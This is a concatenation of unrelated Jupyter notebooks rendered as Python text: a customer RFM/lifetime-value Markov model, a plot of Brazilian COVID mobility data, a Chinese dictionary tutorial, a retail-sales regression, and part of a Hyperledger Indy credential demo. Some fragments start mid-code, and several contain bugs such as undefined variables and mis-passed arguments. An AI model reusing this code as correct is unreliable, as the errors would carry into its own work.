recency matrix: matrix showing user's recency score for a given year.
RFM matrix: matrix showing user's RFM tuple for a given year
'''
recency_matrix = []
RFM_matrix = []
for row_num, boolean_row in enumerate(boolean_matrix.values):
cust_id = int(boolean_matrix.index[row_num])
frequency = 0
recency = 0
recency_row = []
RFM_row = []
for col_num, cell_value in enumerate(boolean_row):
year = boolean_matrix.columns[col_num]
if cell_value == 1:
transactions_by_cust = transactions[transactions['cust_id']==cust_id]
transactions_by_cust_by_year = transactions_by_cust[transactions_by_cust['year'] == year]
monetary = float(transactions_by_cust_by_year['purchase_amt'])
frequency += 1
recency = 0
else:
recency+=1
recency_row.append(recency)
RFM_row.append((recency, frequency, monetary))
recency_matrix.append(recency_row)
RFM_matrix.append(RFM_row)
return recency_matrix, RFM_matrix
def convert_to_discrete_tuple(continuous_tuple):
'''
INPUT: continuous RFM tuple corresponding to a user
OUTPUT: discrete tuple according to the segementation we defined
'''
if continuous_tuple[0] <= 0:
R = 1
elif continuous_tuple[0] < 6:
R = 2
else:
R = 3
if continuous_tuple[1] > 5:
F = 1
else:
F = 2
if continuous_tuple[2] > 50:
M = 1
elif continuous_tuple[2] > 30 or continuous_tuple[2] == 50:
M = 2
else:
M = 3
return R, F, M
def convert_to_state_matrix(continuous_tuple_matrix, RFM_states):
'''
INPUT:
matrix of RFM tuples for each user/year
dictionary mapping RFM tuples to state numbers
OUTPUT:
matrix of states for each user/year
'''
new_matrix = []
for row in continuous_tuple_matrix:
new_row = []
for continuous_tuple in row:
discrete_tuple = convert_to_discrete_tuple(continuous_tuple)
state = RFM_states[discrete_tuple]
new_row.append(state)
new_matrix.append(new_row)
return new_matrix
state_matrix = convert_to_state_matrix(RFM_matrix, RFM_states)
# +
from collections import Counter
# dictionary that maps states to the total customers observed in that state
# key: state number
# value: integer giving total number
total_in_state_dict = {}
# dictionary that maps states to the distribution of states the year following
# key: state number
# value: counter of states the following year
total_transition_states_dict = {}
# +
# build transition matrix for RFMs
for state in range(1, 19):
total_in_state = 0
total_transition_states_observed = Counter()
for year in state_df.columns:
# no data for 2016 so leave 2015 out
if year == '2015':
break
# reduce dataframe to people who were in this state this year
this_state_this_year = state_df[state_df[year] == state]
# total number of people observed in this state this year
total_this_state_this_year = this_state_this_year.shape[0]
total_in_state += total_this_state_this_year
# get count of states observed the next year
next_year = str(int(year) + 1)
observed_states_next_year = Counter(list(this_state_this_year[next_year]))
total_transition_states_observed += observed_states_next_year
total_in_state_dict[state] = total_in_state
total_transition_states_dict[state] = total_transition_states_observed
total_in_state_dict
# -
total_transition_states_dict
# +
# build transition matrix
RFM_transition_matrix = np.zeros((18,18))
for i in range(1,18):
for j in range(1,18):
# absorbtion states
if i >= 13 and i == j:
transition_prob = 1
elif i >= 13 and i != j:
transition_prob = 0
else:
transition_prob = total_transition_states_dict[i][j] / total_in_state_dict[i]
RFM_transition_matrix[i-1, j-1] = transition_prob
# -
pd.DataFrame(RFM_transition_matrix)
# +
# build state matrices for all customers that started after 2005
years = ['2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014']
boolean_matrix_test = boolean_matrix.copy()
state_dataframes = []
for year in years:
no_purchase_first_year = boolean_matrix_test[boolean_matrix_test[year] == 0]
first_purchase_next_year = no_purchase_first_year[no_purchase_first_year[str(int(year)+1)] == 1]
first_purchase_next_year.drop(year, axis=1, inplace=True)
recency_matrix_here, RFM_matrix_here = build_recency_and_RFM_matrix(first_purchase_next_year, transactions)
state_matrix_here = convert_to_state_matrix(RFM_matrix_here, RFM_states)
state_df_here = pd.DataFrame(state_matrix_here)
state_df_here.columns = first_purchase_next_year.columns
state_df_here.index = first_purchase_next_year.index
state_dataframes.append(state_df_here)
boolean_matrix_test.drop(year, axis=1, inplace=True)
# +
initial_counter = Counter(state_df['2015'])
for individual_state_df in state_dataframes:
individual_counter = Counter(individual_state_df['2015'])
initial_counter += individual_counter
# +
# build starting state vector
starting_state = []
for i in range(1, 19):
if i in initial_counter:
starting_state.append(starting_state_counts[i])
else:
starting_state.append(0)
starting_state = np.array(starting_state)
# -
starting_state
# +
new_customer_state_counts = Counter(state_df['2005'])
total_new_customers = [state_df['2005'].count()]
for individual_state_df in state_dataframes:
new_customer_state_counts += Counter(individual_state_df[individual_state_df.columns[0]])
total_new_customers.append(individual_state_df.shape[0])
average_new_customers = np.mean(total_new_customers)//1
new_customer_state_dist = {}
for state, state_count in new_customer_state_counts.items():
new_customer_state_dist[state] = state_count/np.sum(total_new_customers)
new_customer_state_dist
new_state_vector_each_year = np.zeros(18)
new_state_vector_each_year[3] = average_new_customers*new_customer_state_dist[4]//1
new_state_vector_each_year[4] = average_new_customers*new_customer_state_dist[5]//1
new_state_vector_each_year[5] = average_new_customers*new_customer_state_dist[6]//1
new_state_vector_each_year
# +
# build the reward vector
avg_purchase_amt = purchase_amts.mean()
reward_vector = np.zeros(18)
for i in range(6):
reward_vector[i] = avg_purchase_amt - 25
for i in range(6, 12):
reward_vector[i] = - 25
for i in range(12, 18):
reward_vector[i] = 0
# +
I_18 = np.identity(18)
CLV = (np.linalg.inv(I_18 - (1+d)**(-1)*RFM_transition_matrix)).dot(reward_vector)
CLV.reshape(len(CLV),1)
# +
# without policy
revenue_no_policy = []
total_reward = reward_vector*(((1+d)**-1)*RFM_transition_matrix).dot(starting_state)+new_state_vector_each_year
new_state = starting_state.copy()
revenue_no_policy.append(np.sum(total_reward))
for i in range(9):
new_state = (((1+d)**-1)*RFM_transition_matrix).dot(new_state)+new_state_vector_each_year
reward_this_year = reward_vector*new_state
revenue_no_policy.append(np.sum(reward_this_year))
total_reward += reward_this_year
revenue_no_policy
# -
np.sum(revenue_no_policy)
for year, rev in enumerate(revenue_no_policy, 2016):
print(str(year) + "\t" + str(rev))
# +
# with policy
revenue_with_policy = []
reward_vector_with_policy = reward_vector.copy()
# set all the negative CLVs to zero
reward_vector_with_policy[8:] = 0
total_reward = reward_vector_with_policy*(((1+d)**-1)*RFM_transition_matrix).dot(starting_state)+new_state_vector_each_year
new_state = starting_state.copy()
revenue_with_policy.append(np.sum(total_reward))
for i in range(9):
new_state = (((1+d)**-1)*RFM_transition_matrix).dot(new_state)+new_state_vector_each_year
reward_this_year = reward_vector_with_policy*new_state
revenue_with_policy.append(np.sum(reward_this_year))
total_reward += reward_this_year
money = []
for year, rev in enumerate(revenue_with_policy, 2016):
print(str(year) + "\t" + str(rev))
money.append(str(year) + "\t" + str(rev))
# +
fig, axs = plt.subplots(1,1, figsize = (10,5))
total_purchases = boolean_matrix_restricted.apply(lambda x: sum(x), axis=1)
axs.hist(total_purchases, bins=11)
axs.set_title("Histogram of Total Purchases")
axs.set_xlabel("Total Purchases Made")
axs.set_ylabel("Count")
# -
np.sum(revenue_with_policy)
reward_vector.reshape(18, 1)
CLV.reshape(18,1)
np.sum(new_state_vector_each_year)
| 13,618 |
/1FP.ipynb
|
3f8c5553dcc47b829fb79565ed02a5c767b61b9b
|
[] |
no_license
|
LaelRodrigues/Projeto1_ciencia_de_dados
|
https://github.com/LaelRodrigues/Projeto1_ciencia_de_dados
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 204,666 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="Fho7ubzP7TnT"
# !pip install pandas-profiling==2.9.0
# + id="QebfAOeq7-U7"
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import pandas_profiling
import matplotlib.dates as md
# + id="B-yAuWqJ8Gxo"
link = "https://www.gstatic.com/covid19/mobility/Global_Mobility_Report.csv"
data = pd.read_csv(link)
data.head()
# + id="2-FD6VAE8MGW"
data.info()
# + id="GYlvQDsK8UgL"
data.head()
# + id="J9KSLpgN8vdK"
data.country_region.unique()
# + id="uUewHeHb8wSQ"
data_br = data.loc[data.country_region == "Brazil",:].iloc[:,[1,2,3,7,8,9,10,11,12,13]].copy()
data_br.columns = ["country","state","city","date","retail","grocery","parks","transit","workplaces","residential"]
data_br.date = pd.to_datetime(data_br.date)
data_br.index = data_br.date
data_br.drop(labels="date",axis=1,inplace=True)
data_br
# + id="Mk63pjiE87Hj"
data_br.info()
# + id="bjdnbbZzGpP2"
cities = data_br.city.unique()
for i in range(len(cities)):
print(cities[i])
# + id="W5sHYnXMHkP-"
data_br.city = data_br.city.str.replace("Brasiléia","Brasília")
data_br_capital = data_br.loc[(data_br.city == "Rio Branco") | (data_br.city == "Maceió")
| (data_br.city == "Macapá") | (data_br.city == "Manaus") | (data_br.city == "Salvador")
| (data_br.city == "Fortaleza") | (data_br.city == "Brasília") | (data_br.city == "Vitória")
| (data_br.city == "Goiânia") | (data_br.city == "São Luís") | (data_br.city == "Cuiabá")
| (data_br.city == "Campo Grande") | (data_br.city == "Belo Horizonte") | (data_br.city == "Belém")
| (data_br.city == "João Pessoa") | (data_br.city == "Curitiba") | (data_br.city == "Recife")
| (data_br.city == "Teresina") | (data_br.city == "Rio de Janeiro") | (data_br.city == "Natal")
| (data_br.city == "Porto Alegre") | (data_br.city == "Porto Velho") | (data_br.city == "Boa Vista")
| (data_br.city == "Florianópolis") | (data_br.city == "São Paulo") | (data_br.city == "Aracaju")
| (data_br.city == "Palmas"), :]
# + id="As48cD79Shvh"
data_br_capital.head()
# + id="9iR1w1Zmlpu1"
data_br_capital = data_br_capital.loc[~data_br_capital.retail.isnull()].copy()
lin, col = data_br_capital.shape
print(data_br_capital.iloc[0]["city"])
i = 0;
for i in range(lin):
if(data_br_capital.iloc[i]["city"] == "Rio de Janeiro"):
print(data_br_capital.iloc[i]["retail"])
# + id="xvhm5i9g8oNi"
plt.style.use("fivethirtyeight")
# + id="1UiR79d09jrr" executionInfo={"status": "ok", "timestamp": 1601673842932, "user_tz": 180, "elapsed": 5788, "user": {"displayName": "ROBSON LAEL", "photoUrl": "", "userId": "06544713249749143700"}} outputId="05fa2024-e411-4b84-9426-558e03bd8db6" colab={"base_uri": "https://localhost:8080/", "height": 375}
fig, ax = plt.subplots(nrows=1,ncols=5,figsize=(16,4))
item = "retail"
capital = ["São Paulo","Rio de Janeiro","Salvador","Fortaleza", "Belo Horizonte"]
for i,capital in enumerate(capital):
data_br_capital.groupby(by=[data_br_capital.index,"city"]).mean().unstack()[item].rolling(window=7).mean().plot(legend=False,color="grey",linewidth=1, alpha=0.4, ax=ax[i])
data_br_capital.groupby(by=[data_br_capital.index,"city"]).mean().unstack()[item][capital].rolling(window=7).mean().plot(legend=False,color="blue",linewidth=3, alpha=0.6, ax=ax[i])
dd = data_br_capital.groupby(by=[data_br_capital.index,"city"]).mean().unstack()[item][capital].rolling(window=7).mean().copy()
min = dd.iloc[6]
last = dd.iloc[dd.count()+5]
index_last = dd.index[dd.count()+5]
minX = 0
j = 7
for j in range(dd.count()):
if(dd.iloc[j] < min):
minX = j+1
min = dd.iloc[j]
index = dd.index[j]
positionValue = dd.index[j-30]
ax[i].set_title(capital,fontsize=12,ha='right')
ax[i].xaxis.grid(False)
ax[i].set_xlabel("")
ax[i].set_xticklabels(["","mar 1","","","","","sept 16"])
ax[i].set_xlim([dd.index[0],md.datetime.timedelta(days=20) + dd.index[dd.count()-1]])
ax[i].xaxis.set_tick_params(labelsize=10)
ax[i].yaxis.set_tick_params(labelsize=10)
ax[i].scatter(index, min, c="blue", s=150, edgecolors="white", lw=2)
ax[i].scatter(index_last, last, c="blue", s=150, edgecolors="white", lw=2)
ax[i].axhline(y=min, xmin=((minX/dd.count())+0.02), xmax=0.94, linewidth=2, c='grey', linestyle='dashed')
v = abs(((abs(min)+20)/113)-1)
f = abs(((abs(last-3)+20)/108)-1)
ax[i].axvline(x=index_last, ymin=v, ymax=f, linewidth=2, c='red', linestyle='dashed')
ax[i].annotate(s='', xy=(index_last, last-3), xytext=(index_last, last-5), arrowprops=dict(facecolor ='red', linewidth = 2, headwidth=9))
ax[i].text(dd.index[dd.count()-12], last+5, str(int(last)) , dict(size=12), color='black', weight="bold")
ax[i].text(positionValue, min, str(int(min)) , dict(size=12), color='black', weight="bold")
v = int(abs(((last/min)-1)*100))
s = str(v) + '%'
ax[i].text(dd.index[dd.count()-32], -(abs((min+last)/2) + 7), s , dict(size=12), color='red', weight="bold")
if (i==0) or (i==4):
ax[i].yaxis.tick_right()
else:
ax[i].set_yticklabels([])
plt.savefig("capital.png",dpi=300)
plt.show()
# # 字典常见操作
# +
# 访问数据
d = {"one":1, "two":2, "three":3}
# 注意访问格式
# 中括号内是键值
print(d["one"])
d["one"] = "eins"
print(d)
# 删除某个操作
# 使用del操作
del d["one"]
print(d)
# +
# 成员检测, in, not in
# !!!!!!!!!!成员检测检测的是key内容
d = {"one":1, "two":2, "three":3}
if 2 in d:
print("value")
if "two" in d:
print("key")
if ("two",2) in d:
print("kv")
# +
# 便利在python2 和 3 中区别比较大,代码不通用
# 按key来使用for循环
d = {"one":1, "two":2, "three":3}
# 使用for循环,直接按key值访问
for k in d:
print(k, d[k])
# 上述代码可以改写成如下
for k in d.keys():
print(k, d[k])
# 只访问字典的值
for v in d.values():
print(v)
# 注意以下特殊用法
for k,v in d.items():
print(k,'--',v)
# -
# # 字典生成式
# +
d = {"one":1, "two":2, "three":3}
# 常规字典生成式
dd = {k:v for k,v in d.items()}
print(dd)
# 加限制条件的字典生成式
dd = {k:v for k,v in d.items() if v % 2 == 0}
print(dd)
# -
# # 字典相关函数
# 通用函数: len, max, min, dict
# str(字典): 返回字典的字符串格式
d = {"one":1, "two":2, "three":3}
print(str(d))
# +
# clear: 清空字典
# items: 返回字典的键值对组成的元组格式
d = {"one":1, "two":2, "three":3}
i = d.items()
print(type(i))
print(i)
# -
# keys:返回字典的键组成的一个结构
k = d.keys()
print(type(k))
print(k)
# values: 同理,一个可迭代的结构
v = d.values()
print(type(v))
print(v)
# +
# get: 根据制定键返回相应的值, 好处是,可以设置默认值
d = {"one":1, "two":2, "three":3}
print(d.get("on333"))
# get默认值是None,可以设置
print(d.get("one", 100))
print(d.get("one333", '没这玩应'))
#体会以下代码跟上面代码的区别
print(d['on333'])
# -
# fromkeys: 使用指定的序列作为键,使用一个值作为字典的所有的键的值
l = ["eins", "zwei", "drei"]
# 注意fromkeys两个参数的类型
# 注意fromkeys的调用主体
d = dict.fromkeys(l, "hahahahahah")
print(d)
d1 = {}
d2 = {'name', 'bitch'}
d1.update([d2,['fuck', 'yes']])
print(d1)
help(dict
)
| 6,919 |
/Data-Science-HYD-2k19/Topic-Wise/FUNCTIONS/FUNCTIONS (Definitions and Call).ipynb
|
38e88e7840bcd4f178ec8cd4921e7d75d5138e62
|
[] |
no_license
|
Sanjay9921/Python
|
https://github.com/Sanjay9921/Python
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 11,155 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
train = pd.read_csv('train.csv')
test = pd.read_csv('test.csv')
train.head(5)
train.isnull().sum()
train['Item_Weight'].describe()
train['Outlet_Size'].describe()
# +
#fill na of the columns
train['Item_Weight'].fillna(train['Item_Weight'].mean(), inplace = True)
test['Item_Weight'].fillna(test['Item_Weight'].mean(), inplace = True)
train['Outlet_Size'].fillna(train['Outlet_Size'].mode(), inplace = True)
test['Outlet_Size'].fillna(test['Outlet_Size'].mode(), inplace = True)
train['Item_Visibility'].fillna(train['Item_Visibility'].mean(), inplace = True)#change 0 values to mean
test['Item_Visibility'].fillna(test['Item_Visibility'].mean(), inplace = True)#change 0 values to mean
# +
#consolidate based
train['Items_category'] = train['Item_Identifier'].apply(lambda x: x[0:2])
train['Items_category'] = train['Items_category'].map({'FD':'Food','NC':'Non-Consumable','DR':'Drinks'})
train['Items_category'].value_counts()
test['Items_category'] = test['Item_Identifier'].apply(lambda x: x[0:2])
test['Items_category'] = test['Items_category'].map({'FD':'Food','NC':'Non-Consumable','DR':'Drinks'})
test['Items_category'].value_counts()
# -
import matplotlib.pyplot as plt
import seaborn as sns
#Item identifier is a id column
train['Outlet_Identifier'].value_counts
# +
plt.figure(1)
plt.subplot(321)
train['Item_Fat_Content'].value_counts().plot.bar(figsize=(24,10), title= 'Fat_Content')
plt.subplot(322)
train['Item_Type'].value_counts().plot.bar(title = 'Item Type')
plt.subplot(323)
train['Outlet_Identifier'].value_counts().plot.bar(title = 'Outlet Identifier')
plt.subplot(324)
train['Outlet_Size'].value_counts().plot.bar(title = 'Outlet Size')
plt.subplot(325)
train['Outlet_Location_Type'].value_counts().plot.bar(title = 'Outlet Location Type')
plt.subplot(326)
train['Outlet_Type'].value_counts().plot.bar(title = 'Outlet Type')
plt.tight_layout()
plt.show()
# +
#repalce mis-spelled words
train['Item_Fat_Content'].replace('LF', 'Low Fat', inplace = True)
train['Item_Fat_Content'].replace('low fat', 'Low Fat', inplace = True)
train['Item_Fat_Content'].replace('reg', 'Regular', inplace = True)
test['Item_Fat_Content'].replace('LF', 'Low Fat', inplace = True)
test['Item_Fat_Content'].replace('low fat', 'Low Fat', inplace = True)
test['Item_Fat_Content'].replace('reg', 'Regular', inplace = True)
# -
train_1 = train.drop('Item_Identifier', axis = 1)
test_1 = test.drop('Item_Identifier', axis = 1)
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_Weight'])
plt.subplot(122)
train['Item_Weight'].plot.box(figsize = (20,5))
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_Visibility'])
plt.subplot(122)
train['Item_Visibility'].plot.box(figsize = (20,5))
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_MRP'])
plt.subplot(122)
train['Item_MRP'].plot.box(figsize = (20,5))
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Outlet_Establishment_Year'])
plt.subplot(122)
train['Outlet_Establishment_Year'].plot.box(figsize = (20,5))
# +
plt.figure(1)
plt.subplot(121)
sns.distplot(train['Item_Outlet_Sales'])
plt.subplot(122)
train['Item_Outlet_Sales'].plot.box(figsize = (20,5))
# -
# ### Bivariate Analysis
# ### Pre Process the data
# +
#Label encoding
from sklearn.preprocessing import LabelEncoder
cat_cols = ['Item_Fat_Content', 'Item_Type', 'Outlet_Identifier','Outlet_Location_Type', 'Outlet_Type','Items_category']
for col in cat_cols:
train_1[col] = LabelEncoder().fit_transform(train_1[col])
for col in cat_cols:
test_1[col] = LabelEncoder().fit_transform(test_1[col])
# -
train_1['Outlet_Size'] = LabelEncoder().fit_transform(train_1['Outlet_Size'].astype(str))
test_1['Outlet_Size'] = LabelEncoder().fit_transform(test_1['Outlet_Size'].astype(str))
# +
#standard Scale
from sklearn.preprocessing import StandardScaler
import numpy as np
X_train = train_1.drop('Item_Outlet_Sales', axis = 1)
y_train = np.log(train_1['Item_Outlet_Sales'])
X_test = test_1.copy()
X_train_Scale = StandardScaler().fit_transform(X_train)
X_test_Scale = StandardScaler().fit_transform(X_test)
# -
# ### Model Building
# +
#linear regression model
from sklearn.linear_model import LinearRegression
model_lr = LinearRegression()
model_lr.fit(X_train_Scale, y_train)
y_pred = model_lr.predict(X_test_Scale)
submission=pd.read_csv("sample.csv")
submission['Item_Outlet_Sales']=np.exp(y_pred)
submission['Item_Identifier']=test['Item_Identifier']
submission['Outlet_Identifier']=test['Outlet_Identifier']
pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv('linear.csv', index = False)
# +
#ridge regression model
from sklearn.linear_model import Ridge
model_rd = Ridge(alpha=0.5)
model_rd.fit(X_train_Scale, y_train)
y_pred = model_rd.predict(X_test_Scale)
submission=pd.read_csv("sample.csv")
submission['Item_Outlet_Sales']=np.exp(y_pred)
submission['Item_Identifier']=test['Item_Identifier']
submission['Outlet_Identifier']=test['Outlet_Identifier']
pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv('ridge.csv', index = False)
# +
#support vector
from sklearn.svm import SVR
model_svr = SVR()
model_svr.fit(X_train_Scale, y_train)
y_pred = model_svr.predict(X_test_Scale)
submission=pd.read_csv("sample.csv")
submission['Item_Outlet_Sales']=np.exp(y_pred)
submission['Item_Identifier']=test['Item_Identifier']
submission['Outlet_Identifier']=test['Outlet_Identifier']
pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv('svr.csv', index = False)
# +
#decision tree regressor
from sklearn.tree import DecisionTreeRegressor
model_dtr = DecisionTreeRegressor(random_state=111)
model_dtr.fit(X_train_Scale, y_train)
y_pred = model_dtr.predict(X_test_Scale)
submission=pd.read_csv("sample.csv")
submission['Item_Outlet_Sales']=np.exp(y_pred)
submission['Item_Identifier']=test['Item_Identifier']
submission['Outlet_Identifier']=test['Outlet_Identifier']
pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv('dtr.csv', index = False)
# +
#random forest regressor
from sklearn.ensemble import RandomForestRegressor
model_rfr = RandomForestRegressor(random_state=111,n_estimators=200,max_depth=5, min_samples_leaf=100,n_jobs=4)
model_rfr.fit(X_train_Scale, y_train)
y_pred = model_rfr.predict(X_test_Scale)
submission=pd.read_csv("sample.csv")
submission['Item_Outlet_Sales']=np.exp(y_pred)
submission['Item_Identifier']=test['Item_Identifier']
submission['Outlet_Identifier']=test['Outlet_Identifier']
pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv('rfr.csv', index = False)
# -
# #support vector
# from sklearn.svm import SVR
# from sklearn.model_selection import KFold, GridSearchCV, StratifiedKFold
#
# k_fold = KFold(n_splits = 10)
#
# parameters = [{'C': [0.1, 1, 10, 100, 1000],'gamma': [1,0.1,0.01, 0.001, 0.0001],'kernel': ['rbf']},
# {'C':[0.1, 1, 10, 100, 1000], 'kernel' :['linear']},
# {'C':[0.1, 1, 10, 100, 1000], 'kernel' :['poly'], 'degree' : [0,1,2,3,4,5]}]
#
# model_svc_gs = GridSearchCV(estimator = SVR(), param_grid = parameters, cv = k_fold, refit = True)
# model_svc_gs.fit(X_train,y_train)
#
# print('The best parameter is {}'.format(model_svc_gs.best_params_))
#
#
#
# +
#SVR
model_svr_1 = SVR(C = 1000, gamma = 0.0001)
model_svr_1.fit(X_train_Scale, y_train)
y_pred = model_svr_1.predict(X_test_Scale)
submission=pd.read_csv("sample.csv")
submission['Item_Outlet_Sales']=np.exp(y_pred)
submission['Item_Identifier']=test['Item_Identifier']
submission['Outlet_Identifier']=test['Outlet_Identifier']
pd.DataFrame(submission, columns=['Item_Identifier','Outlet_Identifier','Item_Outlet_Sales']).to_csv('svr_1.csv', index = False)
# -
, acme_did, job_certificate_schema,
'TAG1', 'CL', '{"support_revocation": false}')
print("\"Acme\" -> Send \"Acme Job-Certificate\" Credential Definition to Ledger")
await send_cred_def(pool_handle, acme_wallet, acme_did, acme_job_certificate_cred_def_json)
print("==============================")
print("=== Getting Transcript with Faber ==")
print("==============================")
print("== Getting Transcript with Faber - Onboarding ==")
print("------------------------------")
alice_wallet_name = 'alice_wallet'
alice_wallet_credentials = json.dumps({"key": "alice_wallet_key"})
alice_wallet, faber_alice_key, alice_faber_did, alice_faber_key, faber_alice_connection_response \
= await onboarding(pool_handle, pool_name, "Faber", faber_wallet, faber_did, "Alice", None,
alice_wallet_name, alice_wallet_credentials)
print("==============================")
print("== Getting Transcript with Faber - Getting Transcript Credential ==")
print("------------------------------")
print("\"Faber\" -> Create \"Transcript\" Credential Offer for Alice")
transcript_cred_offer_json = \
await anoncreds.issuer_create_credential_offer(faber_wallet, faber_transcript_cred_def_id)
print("\"Faber\" -> Get key for Alice did")
alice_faber_verkey = await did.key_for_did(pool_handle, acme_wallet, faber_alice_connection_response['did'])
print("\"Faber\" -> Authcrypt \"Transcript\" Credential Offer for Alice")
authcrypted_transcript_cred_offer = await crypto.auth_crypt(faber_wallet, faber_alice_key, alice_faber_verkey,
transcript_cred_offer_json.encode('utf-8'))
print("\"Faber\" -> Send authcrypted \"Transcript\" Credential Offer to Alice")
print("\"Alice\" -> Authdecrypted \"Transcript\" Credential Offer from Faber")
faber_alice_verkey, authdecrypted_transcript_cred_offer_json, authdecrypted_transcript_cred_offer = \
await auth_decrypt(alice_wallet, alice_faber_key, authcrypted_transcript_cred_offer)
print("\"Alice\" -> Create and store \"Alice\" Master Secret in Wallet")
alice_master_secret_id = await anoncreds.prover_create_master_secret(alice_wallet, None)
print("\"Alice\" -> Get \"Faber Transcript\" Credential Definition from Ledger")
(faber_transcript_cred_def_id, faber_transcript_cred_def) = \
await get_cred_def(pool_handle, alice_faber_did, authdecrypted_transcript_cred_offer['cred_def_id'])
print("\"Alice\" -> Create \"Transcript\" Credential Request for Faber")
(transcript_cred_request_json, transcript_cred_request_metadata_json) = \
await anoncreds.prover_create_credential_req(alice_wallet, alice_faber_did,
authdecrypted_transcript_cred_offer_json,
faber_transcript_cred_def, alice_master_secret_id)
print("\"Alice\" -> Authcrypt \"Transcript\" Credential Request for Faber")
authcrypted_transcript_cred_request = await crypto.auth_crypt(alice_wallet, alice_faber_key, faber_alice_verkey,
transcript_cred_request_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Transcript\" Credential Request to Faber")
print("\"Faber\" -> Authdecrypt \"Transcript\" Credential Request from Alice")
alice_faber_verkey, authdecrypted_transcript_cred_request_json, _ = \
await auth_decrypt(faber_wallet, faber_alice_key, authcrypted_transcript_cred_request)
print("\"Faber\" -> Create \"Transcript\" Credential for Alice")
transcript_cred_values = json.dumps({
"first_name": {"raw": "Alice", "encoded": "1139481716457488690172217916278103335"},
"last_name": {"raw": "Garcia", "encoded": "5321642780241790123587902456789123452"},
"degree": {"raw": "Bachelor of Science, Marketing", "encoded": "12434523576212321"},
"status": {"raw": "graduated", "encoded": "2213454313412354"},
"ssn": {"raw": "123-45-6789", "encoded": "3124141231422543541"},
"year": {"raw": "2015", "encoded": "2015"},
"average": {"raw": "5", "encoded": "5"}
})
transcript_cred_json, _, _ = \
await anoncreds.issuer_create_credential(faber_wallet, transcript_cred_offer_json,
authdecrypted_transcript_cred_request_json,
transcript_cred_values, None, None)
print("\"Faber\" -> Authcrypt \"Transcript\" Credential for Alice")
authcrypted_transcript_cred_json = await crypto.auth_crypt(faber_wallet, faber_alice_key, alice_faber_verkey,
transcript_cred_json.encode('utf-8'))
print("\"Faber\" -> Send authcrypted \"Transcript\" Credential to Alice")
print("\"Alice\" -> Authdecrypted \"Transcript\" Credential from Faber")
_, authdecrypted_transcript_cred_json, _ = \
await auth_decrypt(alice_wallet, alice_faber_key, authcrypted_transcript_cred_json)
print("\"Alice\" -> Store \"Transcript\" Credential from Faber")
await anoncreds.prover_store_credential(alice_wallet, None, transcript_cred_request_metadata_json,
authdecrypted_transcript_cred_json, faber_transcript_cred_def, None)
print("==============================")
print("=== Apply for the job with Acme ==")
print("==============================")
print("== Apply for the job with Acme - Onboarding ==")
print("------------------------------")
alice_wallet, acme_alice_key, alice_acme_did, alice_acme_key, acme_alice_connection_response = \
await onboarding(pool_handle, pool_name, "Acme", acme_wallet, acme_did, "Alice", alice_wallet,
alice_wallet_name, alice_wallet_credentials)
print("==============================")
print("== Apply for the job with Acme - Transcript proving ==")
print("------------------------------")
print("\"Acme\" -> Create \"Job-Application\" Proof Request")
job_application_proof_request_json = json.dumps({
'nonce': '1432422343242122312411212',
'name': 'Job-Application',
'version': '0.1',
'requested_attributes': {
'attr1_referent': {
'name': 'first_name'
},
'attr2_referent': {
'name': 'last_name'
},
'attr3_referent': {
'name': 'degree',
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
},
'attr4_referent': {
'name': 'status',
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
},
'attr5_referent': {
'name': 'ssn',
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
},
'attr6_referent': {
'name': 'phone_number'
}
},
'requested_predicates': {
'predicate1_referent': {
'name': 'average',
'p_type': '>=',
'p_value': 4,
'restrictions': [{'cred_def_id': faber_transcript_cred_def_id}]
}
}
})
print("\"Acme\" -> Get key for Alice did")
alice_acme_verkey = await did.key_for_did(pool_handle, acme_wallet, acme_alice_connection_response['did'])
print("\"Acme\" -> Authcrypt \"Job-Application\" Proof Request for Alice")
authcrypted_job_application_proof_request_json = \
await crypto.auth_crypt(acme_wallet, acme_alice_key, alice_acme_verkey,
job_application_proof_request_json.encode('utf-8'))
print("\"Acme\" -> Send authcrypted \"Job-Application\" Proof Request to Alice")
print("\"Alice\" -> Authdecrypt \"Job-Application\" Proof Request from Acme")
acme_alice_verkey, authdecrypted_job_application_proof_request_json, _ = \
await auth_decrypt(alice_wallet, alice_acme_key, authcrypted_job_application_proof_request_json)
print("\"Alice\" -> Get credentials for \"Job-Application\" Proof Request")
creds_for_job_application_proof_request = json.loads(
await anoncreds.prover_get_credentials_for_proof_req(alice_wallet,
authdecrypted_job_application_proof_request_json))
print(creds_for_job_application_proof_request)
cred_for_attr1 = creds_for_job_application_proof_request['attrs']['attr1_referent'][0]['cred_info']
cred_for_attr2 = creds_for_job_application_proof_request['attrs']['attr2_referent'][0]['cred_info']
cred_for_attr3 = creds_for_job_application_proof_request['attrs']['attr3_referent'][0]['cred_info']
cred_for_attr4 = creds_for_job_application_proof_request['attrs']['attr4_referent'][0]['cred_info']
cred_for_attr5 = creds_for_job_application_proof_request['attrs']['attr5_referent'][0]['cred_info']
cred_for_predicate1 = creds_for_job_application_proof_request['predicates']['predicate1_referent'][0]['cred_info']
creds_for_job_application_proof = {cred_for_attr1['referent']: cred_for_attr1,
cred_for_attr2['referent']: cred_for_attr2,
